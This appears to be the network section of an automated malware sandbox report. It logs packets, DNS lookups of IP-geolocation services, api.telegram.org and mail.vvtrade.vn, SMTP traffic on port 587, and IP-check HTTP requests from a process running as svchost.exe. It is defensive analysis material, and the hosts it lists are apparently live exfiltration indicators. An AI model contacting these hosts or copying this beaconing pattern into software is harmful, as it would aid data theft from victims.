                                      Jul 25, 2024 03:34:58.130582094 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.240441084 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.240458012 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.240559101 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.240688086 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.246198893 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.589823961 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.590799093 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.590903044 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.590936899 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.590955019 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.595864058 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.595920086 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.596281052 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.596373081 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.596401930 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:03.240335941 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:03.244831085 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.244924068 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.245043993 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.245331049 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.245363951 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.295283079 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:03.927391052 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.937735081 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.937769890 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.937865973 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.937874079 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:04.519695044 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:04.519778967 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:04.519876003 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:04.520241976 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:04.520389080 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:04.525218964 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:04.867557049 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:04.867760897 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:04.867794037 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:04.867841959 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:04.872558117 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:24.250859022 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:24.250891924 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:24.251019955 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:24.251040936 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:24.256779909 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:24.256787062 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:24.356255054 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:24.364514112 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:24.364542961 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:24.475872040 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:24.487140894 CEST4973680192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:24.492944002 CEST8049736158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:24.493087053 CEST4973680192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:24.493671894 CEST4973680192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:24.499526978 CEST8049736158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:24.530335903 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.104382038 CEST8049736158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:25.105099916 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.105221987 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.106060028 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.106091976 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.106122971 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.106329918 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.106405020 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.106410027 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.155286074 CEST4973680192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:25.596724987 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.596873999 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.599054098 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.599073887 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.600039959 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.606270075 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.648508072 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.760776043 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.760870934 CEST44349737188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:25.761001110 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.761452913 CEST49737443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:25.767435074 CEST4973680192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:25.768023014 CEST4973880192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:25.772840977 CEST8049736158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:25.772892952 CEST4973680192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:25.772927046 CEST8049738158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:25.773022890 CEST4973880192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:25.773118019 CEST4973880192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:25.777856112 CEST8049738158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:26.399452925 CEST8049738158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:26.400783062 CEST49739443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:26.400824070 CEST44349739188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:26.400895119 CEST49739443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:26.401189089 CEST49739443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:26.401222944 CEST44349739188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:26.451406002 CEST4973880192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:26.859608889 CEST44349739188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:26.861788034 CEST49739443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:26.861828089 CEST44349739188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:26.997195005 CEST44349739188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:26.997303009 CEST44349739188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:26.997394085 CEST49739443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:26.997975111 CEST49739443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:27.001935959 CEST4973880192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:27.003359079 CEST4974080192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:27.008410931 CEST8049738158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:27.008524895 CEST4973880192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:27.008575916 CEST8049740158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:27.008685112 CEST4974080192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:27.008814096 CEST4974080192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:27.013765097 CEST8049740158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:27.642046928 CEST8049740158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:27.643580914 CEST49741443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:27.643637896 CEST44349741188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:27.643718004 CEST49741443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:27.644006968 CEST49741443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:27.644016981 CEST44349741188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:27.685903072 CEST4974080192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:28.126871109 CEST44349741188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:28.129061937 CEST49741443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:28.129090071 CEST44349741188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:28.267448902 CEST44349741188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:28.267669916 CEST44349741188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:28.267786980 CEST49741443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:28.268419981 CEST49741443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:28.275763035 CEST4974080192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:28.277167082 CEST4974280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:28.281043053 CEST8049740158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:28.281141996 CEST4974080192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:28.282227993 CEST8049742158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:28.282313108 CEST4974280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:28.282684088 CEST4974280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:28.288002014 CEST8049742158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:28.918694019 CEST8049742158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:28.924405098 CEST49744443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:28.924520016 CEST44349744188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:28.924686909 CEST49744443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:28.926105976 CEST49744443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:28.926143885 CEST44349744188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:28.968130112 CEST4974280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:29.401108980 CEST44349744188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:29.403095007 CEST49744443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:29.403177023 CEST44349744188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:29.531785965 CEST44349744188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:29.531877041 CEST44349744188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:29.531944036 CEST49744443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:29.532538891 CEST49744443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:29.541583061 CEST4974280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:29.542212963 CEST4974580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:29.547451973 CEST8049742158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:29.547513008 CEST4974280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:29.547579050 CEST8049745158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:29.547672033 CEST4974580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:29.547746897 CEST4974580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:29.552947998 CEST8049745158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:30.161107063 CEST8049745158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:30.163773060 CEST49746443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:30.163809061 CEST44349746188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:30.163912058 CEST49746443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:30.164186001 CEST49746443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:30.164197922 CEST44349746188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:30.216973066 CEST4974580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:30.684653044 CEST44349746188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:30.687179089 CEST49746443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:30.687216043 CEST44349746188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:30.844477892 CEST44349746188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:30.844738960 CEST44349746188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:30.844854116 CEST49746443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:30.845453978 CEST49746443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:30.850368977 CEST4974580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:30.851353884 CEST4974780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:30.855598927 CEST8049745158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:30.855664015 CEST4974580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:30.856373072 CEST8049747158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:30.856518030 CEST4974780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:30.856669903 CEST4974780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:30.864969015 CEST8049747158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:31.458009958 CEST8049747158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:31.460319042 CEST49748443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:31.460365057 CEST44349748188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:31.460561037 CEST49748443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:31.460794926 CEST49748443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:31.460808039 CEST44349748188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:31.514089108 CEST4974780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:31.940102100 CEST44349748188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:31.941934109 CEST49748443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:31.941953897 CEST44349748188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:32.136095047 CEST44349748188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:32.136230946 CEST44349748188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:35:32.136313915 CEST49748443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:32.136825085 CEST49748443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:35:32.166186094 CEST4974780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:32.167032957 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:32.167068958 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:32.167149067 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:32.167562008 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:32.167568922 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:32.172365904 CEST8049747158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:35:32.172440052 CEST4974780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:35:32.795417070 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:32.797219038 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:32.797219038 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:32.797234058 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:32.797544956 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:32.798888922 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:32.844490051 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:33.045531988 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:33.045639038 CEST44349749149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:33.045892000 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:33.048383951 CEST49749443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:39.174560070 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:39.179637909 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:39.179763079 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:40.596565008 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:40.597001076 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:40.601828098 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:40.947813988 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:40.948426008 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:40.953339100 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:41.298463106 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:41.298823118 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:41.303607941 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:41.664545059 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:41.664872885 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:41.669727087 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.014945030 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.015125036 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:42.019934893 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.515909910 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.516088963 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:42.521017075 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.866134882 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.866903067 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:42.866903067 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:42.866959095 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:42.866959095 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:42.871696949 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.871717930 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.871861935 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.871870995 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:42.871880054 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:49.490308046 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:49.493995905 CEST49751443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:49.494048119 CEST44349751149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:49.494184971 CEST49751443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:49.494404078 CEST49751443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:49.494416952 CEST44349751149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:49.545152903 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:50.129125118 CEST44349751149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:50.131795883 CEST49751443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:50.131819010 CEST44349751149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:50.131921053 CEST49751443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:50.131932020 CEST44349751149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:50.364171982 CEST44349751149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:50.364267111 CEST44349751149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:50.364331007 CEST49751443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:50.364670038 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:50.364837885 CEST49751443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:50.371274948 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:50.715406895 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:50.715454102 CEST58749750118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:50.715576887 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:50.715576887 CEST49750587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:50.724412918 CEST58749750118.69.190.131192.168.2.5

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 25, 2024 03:34:34.889838934 CEST6276953192.168.2.51.1.1.1
                                      Jul 25, 2024 03:34:34.915257931 CEST53627691.1.1.1192.168.2.5
                                      Jul 25, 2024 03:34:36.254282951 CEST4996353192.168.2.51.1.1.1
                                      Jul 25, 2024 03:34:36.261763096 CEST53499631.1.1.1192.168.2.5
                                      Jul 25, 2024 03:34:47.487230062 CEST5625253192.168.2.51.1.1.1
                                      Jul 25, 2024 03:34:47.494232893 CEST53562521.1.1.1192.168.2.5
                                      Jul 25, 2024 03:34:54.734883070 CEST5498853192.168.2.51.1.1.1
                                      Jul 25, 2024 03:34:55.210252047 CEST53549881.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 25, 2024 03:34:34.889838934 CEST192.168.2.51.1.1.10xf95Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:36.254282951 CEST192.168.2.51.1.1.10xf9faStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:47.487230062 CEST192.168.2.51.1.1.10xeccStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:54.734883070 CEST192.168.2.51.1.1.10xe7cbStandard query (0)mail.vvtrade.vnA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 25, 2024 03:34:34.915257931 CEST1.1.1.1192.168.2.50xf95No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                      Jul 25, 2024 03:34:34.915257931 CEST1.1.1.1192.168.2.50xf95No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:34.915257931 CEST1.1.1.1192.168.2.50xf95No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:34.915257931 CEST1.1.1.1192.168.2.50xf95No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:34.915257931 CEST1.1.1.1192.168.2.50xf95No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:34.915257931 CEST1.1.1.1192.168.2.50xf95No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:36.261763096 CEST1.1.1.1192.168.2.50xf9faNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:36.261763096 CEST1.1.1.1192.168.2.50xf9faNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:47.494232893 CEST1.1.1.1192.168.2.50xeccNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                      Jul 25, 2024 03:34:55.210252047 CEST1.1.1.1192.168.2.50xe7cbNo error (0)mail.vvtrade.vn118.69.190.131A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • reallyfreegeoip.org
                                      • api.telegram.org
                                      • checkip.dyndns.org

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:34.928858042 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:35.529810905 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:35 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: cd027b2aa5a004069f132d71811e6a3e
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 25, 2024 03:34:35.534837961 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:35.705096006 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:35 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 77abd8fb4f2affef2372dd936f33d6c0
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 25, 2024 03:34:37.297250986 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:37.468378067 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 40124971301770b4e38286b02bf9db9f
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


